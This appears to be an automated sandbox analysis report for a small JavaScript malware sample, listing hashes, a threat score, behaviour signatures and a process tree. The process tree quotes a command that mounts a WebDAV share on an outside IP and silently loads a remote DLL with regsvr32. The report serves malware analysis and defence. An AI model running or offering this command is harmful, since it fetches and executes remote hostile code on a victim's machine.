Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
21/07/2024, 15:25
Static task
static1
Behavioral task
behavioral1
Sample
20165240273081030282.js
Resource
win7-20240708-en
3 signatures
150 seconds
Behavioral task
behavioral2
Sample
20165240273081030282.js
Resource
win10v2004-20240709-en
5 signatures
150 seconds
General
-
Target
20165240273081030282.js
-
Size
3KB
-
MD5
50ddfee563ab4aac8262d5af215e3654
-
SHA1
768d954fd9777b5df6934782dcfd4cebf7f6f620
-
SHA256
873f260f38acc2720a5c9f975efd22e048b1fed9833b8c8deb07ce9dd7d772d5
-
SHA512
081aa9e38b1e5ccac7c39cd75235ffae8076dccfbeb00764276fcd540abb067bcce57e35c1aac9d01ebad339d5e81d091ade954cc1d4f0822e30ed7aee224224
Score
3/10
Malware Config
Signatures
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1984 wrote to memory of 2560 1984 wscript.exe 30 PID 1984 wrote to memory of 2560 1984 wscript.exe 30 PID 1984 wrote to memory of 2560 1984 wscript.exe 30 PID 2560 wrote to memory of 2540 2560 cmd.exe 32 PID 2560 wrote to memory of 2540 2560 cmd.exe 32 PID 2560 wrote to memory of 2540 2560 cmd.exe 32
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\20165240273081030282.js1⤵
- Suspicious use of WriteProcessMemory
PID:1984 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k net use \\45.9.74.36@8888\davwwwroot\ && regsvr32 /s \\45.9.74.36@8888\davwwwroot\69061822325566.dll2⤵
- Suspicious use of WriteProcessMemory
PID:2560 -
C:\Windows\system32\net.exenet use \\45.9.74.36@8888\davwwwroot\3⤵PID:2540
-
-